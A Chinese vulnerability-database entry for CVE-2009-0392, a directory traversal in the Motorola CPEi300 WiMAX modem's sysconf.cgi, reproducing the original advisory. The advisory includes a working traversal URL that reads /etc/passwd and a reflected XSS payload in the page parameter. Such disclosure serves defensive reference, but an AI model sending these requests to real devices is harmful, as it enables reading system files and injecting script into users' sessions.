motorola cpei300 目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117314 漏洞类型 路径遍历
发布时间 2009-01-29 更新时间 2009-02-03
CVE编号 CVE-2009-0392 CNNVD-ID CNNVD-200902-039
漏洞平台 Hardware CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/7915
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-039
|漏洞详情
CPEi300是摩托罗拉生产的一款客户预置设备(CPE)。MotorolaWimaxmodemCPEi300中的sysconf.cgi存在目录遍历漏洞。远程认证用户可以借助页参数中的"..",读取任意文件。
|漏洞EXP
#####################################################################################
#
#   Name    :   Motorola Wimax modem CPEi300 Multiple Vulnerabilities
#   Author  :   Usman Saeed 
#   Company :   Xc0re Security Reasearch Group
#   Homepage :  http://www.xc0re.net
#
#####################################################################################


[Note: User needs to logged in! ]

[*] Attack type : Remote

[*] Patch Status : Unpatched

[*] Exploitation : 

   [+] Directory traversal
	http://Hostname/cgi-bin/sysconf.cgi?page=../../../etc/passwd&action=request&sid=AeoFSFoI4lDs 

   [+] XSS 

	http://Hostname/cgi-bin/sysconf.cgi?page="><script>alert(1);</script>"&action=request&sid=AeoFSFoI4lDs  


# milw0rm.com [2009-01-29]
|参考资料

来源:BID
名称:33519
链接:http://www.securityfocus.com/bid/33519
来源:BUGTRAQ
名称:20090129MotorolaWimaxModemCPEi300MultipleVulnerabilities
链接:http://www.securityfocus.com/archive/1/archive/1/500545/100/0/threaded
来源:MILW0RM
名称:7915
链接:http://www.milw0rm.com/exploits/7915